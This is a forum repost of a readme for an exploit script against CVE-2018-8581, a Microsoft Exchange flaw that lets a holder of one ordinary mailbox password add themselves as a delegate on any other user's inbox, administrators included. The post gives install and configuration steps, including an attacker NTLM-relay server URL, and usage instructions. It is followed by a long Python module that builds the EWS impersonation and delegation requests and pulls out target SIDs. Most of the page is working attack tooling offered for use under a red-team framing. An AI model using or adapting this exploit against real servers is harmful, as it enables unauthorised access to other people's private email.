Nytro Posted January 4, 2019

CVE-2018-8581

This is a mailbox-level lateral movement and privilege escalation vulnerability in Exchange Server. With nothing more than the password of an ordinary mailbox account, it lets you take over the inbox of any other user (including domain administrators) by having yourself added as a delegate on that mailbox.

This EXP script is an enhanced one-click version built on top of the original PoC. Once the parameters are configured it automatically adds (and later removes) the delegate on the target mailbox's inbox, so that the client's (Party A's) security department and red team can run a simulated attack against an enterprise that has authorized the test.

The original PoC consists of two scripts that together add an inbox rule, which is not very practical for a Party A red team in day-to-day work. Besides the mailbox address, the original PoC also requires the SID of the target mailbox user. I tested the method of obtaining the user SID given in the reference article in a real environment and could not reproduce it on Exchange Server 2010 or 2013 (2010 has no such option; 2013 reports that you have no permission for the operation). My approach is therefore to first perform a reverse delegation, which yields the SID of the target mailbox user, and then remove that delegate again.

How to use

Install python-ntlm:

pip install python-ntlm

Then configure the following parameters in the script (unchanged parts elided):

...
# Exchange server config
IP = 'mail.target_domain.com'
PORT = 443
PROTO = 'https'
# PORT = 80
# PROTO = 'http'

# CONTROLLED_EMAIL and TARGET_EMAIL config
USER = 'the_email_u_have'
DOMAIN = 'the_domain_name'
PASS = 'password_of_the_email_u_have'
TARGET_EMAIL = "the_target_email_u_want@target_domain.com"
CONTROLLED_EMAIL = "the_email_u_have@target_domain"

# FLAG == 1 --> AddDelegate, FLAG == 0 --> RemoveDelegate
FLAG = 1

# Exchange server version
# EXCHANGE_VERSION = "Exchange2010_SP1"
EXCHANGE_VERSION = "Exchange2010_SP2"
# EXCHANGE_VERSION = "Exchange2010_SP3"
# EXCHANGE_VERSION = "Exchange2013"
# EXCHANGE_VERSION = "Exchange2016"

# Port and url of ur HTTP server that will use NTLM hashes for impersonation of TARGET_EMAIL
HTTPPORT = 8080
EVIL_HTTPSERVER_URL = "http://ur_http_server_ip:8080/"

...

Run the script, then go and make some tea and wait about a minute. The inbox of TARGET_EMAIL has now been delegated to CONTROLLED_EMAIL, and you can view the target mailbox's inbox in OWA or Outlook.

Change FLAG to 0 and run the script again; after another minute the delegate added earlier is removed and the target inbox can no longer be accessed.

Applicable environment

Python 2.7.14
Exchange Server 2010 (stable; succeeds against a basic Exchange Server 2010 test installation)
Exchange Server 2013 (may fail depending on the environment)
Exchange Server 2016 (may fail depending on the environment)

More

Other EWS SOAP API requests can be substituted by editing the make_relay_body() function.

While trying to take the relay further and use the captured Net-NTLM hash against other hosts that do not require SMB signing, I found that the hashes obtained all belong to the Exchange Server itself. They might be usable for a cross-protocol relay against the Exchange Server when SMB signing is disabled on it, but that situation is rarely encountered in practice.

Description

The script is for learning and exchange only. Please follow the relevant local laws. The author bears no legal responsibility for any other use; downloading and using the script means the user agrees with the above.

Source: https://github.com/WyAtu/CVE-2018-8581/
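As an added illustration of the delegation calls the post describes (example code written for this page, not the WyAtu script, which is Python 2.7, nor the original PoC), the following Python 3 module builds the EWS SOAP requests involved and pulls the target user's SID out of the "reverse delegation" response. Element and namespace names follow the public EWS schema for AddDelegate, RemoveDelegate and the ExchangeImpersonation header; the function names, the placeholder addresses and SAMPLE_RESPONSE are assumptions constructed for the example, and the NTLM-relaying HTTP server that would actually deliver the relayed body to EWS is deliberately not included.

```python
"""Added example, not code from the WyAtu repo or the original PoC: builds the
EWS SOAP requests the post describes and extracts the target user's SID from
the 'reverse delegation' response.  SAMPLE_RESPONSE is constructed."""
import xml.etree.ElementTree as ET

NS_SOAP = "http://schemas.xmlsoap.org/soap/envelope/"
NS_T = "http://schemas.microsoft.com/exchange/services/2006/types"
NS_M = "http://schemas.microsoft.com/exchange/services/2006/messages"

def _user_id(who):
    """t:UserId accepts either a SID or an SMTP address; pick by shape."""
    tag = "SID" if who.upper().startswith("S-1-") else "PrimarySmtpAddress"
    return f"<t:UserId><t:{tag}>{who}</t:{tag}></t:UserId>"

def envelope(body, version="Exchange2010_SP2", impersonate_sid=None):
    """Wrap an EWS operation.  With impersonate_sid set, the request carries the
    ExchangeImpersonation header under which the relayed session acts as that user."""
    header = f'<t:RequestServerVersion Version="{version}"/>'
    if impersonate_sid:
        header += ("<t:ExchangeImpersonation><t:ConnectingSID>"
                   f"<t:SID>{impersonate_sid}</t:SID>"
                   "</t:ConnectingSID></t:ExchangeImpersonation>")
    return (f'<soap:Envelope xmlns:soap="{NS_SOAP}" xmlns:t="{NS_T}" xmlns:m="{NS_M}">'
            f"<soap:Header>{header}</soap:Header>"
            f"<soap:Body>{body}</soap:Body></soap:Envelope>")

def add_delegate(mailbox, delegate, level="Editor", **kw):
    """AddDelegate: give `delegate` `level` rights on `mailbox`'s Inbox."""
    body = (f"<m:AddDelegate><m:Mailbox><t:EmailAddress>{mailbox}</t:EmailAddress>"
            f"</m:Mailbox><m:DelegateUsers><t:DelegateUser>{_user_id(delegate)}"
            f"<t:DelegatePermissions><t:InboxFolderPermissionLevel>{level}"
            "</t:InboxFolderPermissionLevel></t:DelegatePermissions>"
            "</t:DelegateUser></m:DelegateUsers></m:AddDelegate>")
    return envelope(body, **kw)

def remove_delegate(mailbox, delegate, **kw):
    """RemoveDelegate: the cleanup step (FLAG = 0 in the script)."""
    body = (f"<m:RemoveDelegate><m:Mailbox><t:EmailAddress>{mailbox}</t:EmailAddress>"
            f"</m:Mailbox><m:UserIds>{_user_id(delegate)}</m:UserIds></m:RemoveDelegate>")
    return envelope(body, **kw)

def delegate_sids(response_xml):
    """Map each delegate's SMTP address to the SID Exchange resolved for it in an
    AddDelegate/GetDelegate response: the 'reverse delegation' SID lookup."""
    root = ET.fromstring(response_xml)
    found = {}
    for uid in root.iter(f"{{{NS_T}}}UserId"):
        smtp = uid.findtext(f"{{{NS_T}}}PrimarySmtpAddress")
        sid = uid.findtext(f"{{{NS_T}}}SID")
        if smtp and sid:
            found[smtp.lower()] = sid
    return found

def describe(envelope_xml):
    """Parse an envelope back into (operation, mailbox, delegate, impersonated SID),
    the same check you would apply when reviewing a request body."""
    root = ET.fromstring(envelope_xml)
    op = root.find(f"{{{NS_SOAP}}}Body")[0]
    uid = next(op.iter(f"{{{NS_T}}}UserId"))
    return (op.tag.split("}")[1],
            op.findtext(f"{{{NS_M}}}Mailbox/{{{NS_T}}}EmailAddress"),
            uid.findtext(f"{{{NS_T}}}SID") or uid.findtext(f"{{{NS_T}}}PrimarySmtpAddress"),
            root.findtext(f"{{{NS_SOAP}}}Header/{{{NS_T}}}ExchangeImpersonation/"
                          f"{{{NS_T}}}ConnectingSID/{{{NS_T}}}SID"))

def takeover_plan(controlled, target, version="Exchange2010_SP2"):
    """Requests in the order the post describes: reverse-delegate the target onto
    the controlled mailbox to learn its SID, undo that, then the body handed to
    the relayed NTLM session (flag=1 adds the delegate, flag=0 removes it)."""
    reverse_add = add_delegate(controlled, target, version=version)
    reverse_remove = remove_delegate(controlled, target, version=version)

    def relay_body(target_sid, flag=1):
        op = add_delegate if flag == 1 else remove_delegate
        return op(target, controlled, version=version, impersonate_sid=target_sid)

    return reverse_add, reverse_remove, relay_body

# Constructed AddDelegateResponse (placeholder SID and addresses), shaped like
# Exchange's answer to the reverse-delegation request above.
SAMPLE_RESPONSE = f"""<s:Envelope xmlns:s="{NS_SOAP}"><s:Body>
<m:AddDelegateResponse ResponseClass="Success" xmlns:m="{NS_M}" xmlns:t="{NS_T}">
 <m:ResponseCode>NoError</m:ResponseCode><m:ResponseMessages>
 <m:DelegateUserResponseMessageType ResponseClass="Success">
  <m:ResponseCode>NoError</m:ResponseCode><m:DelegateUser><t:UserId>
   <t:SID>S-1-5-21-1111111111-2222222222-3333333333-1105</t:SID>
   <t:PrimarySmtpAddress>administrator@target_domain.com</t:PrimarySmtpAddress>
   <t:DisplayName>Administrator</t:DisplayName>
  </t:UserId></m:DelegateUser>
 </m:DelegateUserResponseMessageType></m:ResponseMessages>
</m:AddDelegateResponse></s:Body></s:Envelope>"""
```

Typical use is takeover_plan(CONTROLLED_EMAIL, TARGET_EMAIL): send the first body as the controlled user, feed the response to delegate_sids() to get the target's SID, send the second body to clean up, and hand relay_body(sid) (or relay_body(sid, flag=0) for removal) to whatever relays the Exchange machine account's NTLM authentication back to EWS. describe() is included so the generated envelopes can be checked offline before anything is sent.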